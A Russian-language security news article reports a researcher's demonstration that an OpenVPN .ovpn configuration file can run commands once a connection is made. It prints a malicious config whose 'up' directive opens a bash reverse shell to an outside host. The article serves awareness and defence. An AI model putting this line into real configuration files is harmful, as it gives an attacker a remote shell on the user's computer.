Файлы конфигурации клиента OpenVPN могут использоваться для установки бэкдоров

Специалисты в области кибербезопасности неоднократно предупреждали о рисках загрузки контента из непроверенных источников, поскольку многие из таких файлов могут содержать вредоносный код, нежелательное рекламное ПО или скрипты, осуществляющие вредоносную деятельность на компьютере. Исследователь Джейкоб Бэйнс (Jacob Baines) продемонстрировал, как простой конфигурационный файл (.ovpn) клиента OpenVPN может использоваться для выполнения команд на компьютере после установки VPN-соединения.

Согласно Бэйнсу, для превращения безопасного конфигурационного файла во вредоносный злоумышленникам потребуется всего лишь добавить несколько строк кода. В примере исследователя, конфигурационный файл имеет следующий вид:

remote 192.168.1.245  	  ifconfig 10.200.0.2 10.200.0.1  	  dev tun 

Если злоумышленнику требуется выполнить команду, он может добавить строку script-security 2 (разрешает OpenVPN выполнять пользовательские скрипты) и запись "up", содержащую команду, которая выполнится после установки соединения.

 remote 192.168.1.245  	   ifconfig 10.200.0.2 10.200.0.1  	   dev tun  	   script-security 2  	   up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’” 

Таким образом атакующий получит возможность удаленно выполнить команды на компьютере с запущенным файлом конфигурации OpenVPN.

По словам эксперта, данный метод также может использоваться для атак на пользователей компьютеров под управлением Windows с помощью скрипта PowerShell. Более подробно техника описана здесь .

Хотя Бэйнс пока не сталкивался со случаями применения описанного им метода, специалист призвал с осторожностью относиться к недоверенным ovpn файлам или использовать такие OpenVPN-клиенты, как Viscosity, снижающие риск подобных атак.

OpenVPN — свободная реализация технологии виртуальной частной сети (VPN) с открытым исходным кодом для создания зашифрованных каналов типа точка-точка или сервер-клиенты между компьютерами. Она позволяет устанавливать соединения между компьютерами, находящимися за NAT и сетевым экраном, без необходимости изменения их настроек.